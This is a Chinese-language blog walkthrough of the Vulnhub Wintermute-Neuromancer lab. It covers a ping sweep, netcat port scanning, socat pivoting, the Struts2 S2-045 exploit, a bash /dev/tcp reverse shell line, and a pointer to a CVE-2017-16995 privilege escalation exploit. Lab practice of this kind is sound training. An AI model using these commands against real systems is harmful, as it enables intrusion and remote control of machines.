• WintermuteNeuromancer靶机测试笔记


    Vulnhub-Wintermute-Neuromancer靶机地址

    首先文件目录中readme说了需要单独设置网段,只能通过另一台靶机访问,如果我们可以直接访问那算作弊。。

    注意这儿目标靶机一定是网卡2,不要改动,不然会访问不到

    那么接上一台靶机的meterpreter
    Wintermute-Straylighy靶机测试笔记

    首先 之前的靶机有提示本靶机存在/struts2_2.3.15.1-showcase目录,且这个struts2版本是存在045漏洞的,所以一会直奔这个去就行

    之前的靶机地址为106,

    先在106上扫2段找下靶机地址,
    写入文件执行,

    #!/bin/bash
    for ip in 192.168.2.{1..254} 
    do 
        ping $ip -c 1 &> /dev/null 
            if [ $? -eq 0 ];then 
                echo $ip is alive .... 
            fi 
    done
    
    

    存在103 106 ,那靶机地址就是103了, ps这个ping太浪费时间了
    继续扫描端口,验证是否存在nc netcat或者nmap等工具

    存在nc 那么利用它扫端口就行

    nc -nv -w2 -z 192.168.2.103 1-65535 |gerp -rin 'open'
    

    找到3个open端口,先看下8080页面,看标题是tomcat/9.0.0的首页

    看下106靶机提示的war包
    http://192.168.2.103:8080/struts2_2.3.15.1-showcase

    好吧 没有结果,还是尝试端口转发过来吧
    先确认106本机8080是否开启

    未开启,那么我们转发到8080端口

    socat TCP4-LISTEN:8080,reuseaddr,fork,su=nobody TCP4:192.168.2.103:8080
    

    访问下 转发成功了

    再次尝试连接http://192.168.61.243:8080/struts2_2.3.15.1-showcase发现页面会自动跳转

    好奇为啥curl为空,看上图,响应确实是空 。。
    既然目录能访问到了 那么该试下struts2漏洞了

    存在045漏洞 执行shell

    尝试反弹shell会本地,发现网络不通。忘了要加转发了

    再次转发下端口,把自己本机和106的机器打通。在106上运行
    socat tcp-listen:888,fork tcp:192.168.61.242:888 &

    然后本地侦听888端口,然后在struts2的shell上运行
    bash -i>&/dev/tcp/192.168.2.106/888 0>&1

    截图的时候发现上面写执行失败 但是验证了shell是过来了而且没断

    提权:
    复制vEnum.sh内容,使用vim直接写入 赋权 执行。
    发现os为ubuntu16.04 , 这个是有漏洞的

    CVE-2017-16995
    看了下目标机器没有gcc,那么本地编译下

    上传文件到106机器上,并开启python的http服务


    执行报错了,肯定是因为编译平台的问题,
    使用https://github.com/RealBearcat/CVE-2017-16995这个可以解决

    总结:
    考察内网测试,端口转发技术,struts2-045漏洞,CVE-2017-16995提权漏洞,

    记录:
    socat TCP4-LISTEN:8080,reuseaddr,fork,su=nobody TCP4:192.168.2.103:8080 #socat中间人端口转发

  • 相关阅读:
    [BZOJ]1040: [ZJOI2008]骑士
    [BZOJ]1177: [Apio2009]Oil
    【luogu3384】【模板】树链剖分
    【NOIP2012TG】solution
    【NOIP2014TG】solution
    【NOIP2016TG】solution
    【NOIP2015TG】solution
    【NOIP2016】【LCA】【树上差分】【史诗级难度】天天爱跑步
    【网络流】【BZOJ1221】【HNOI2001】软件开发
    【网络流】【BZOJ1061】【NOI2008】志愿者招募
  • 原文地址:https://www.cnblogs.com/zongdeiqianxing/p/13492165.html
Copyright © 2020-2023  润新知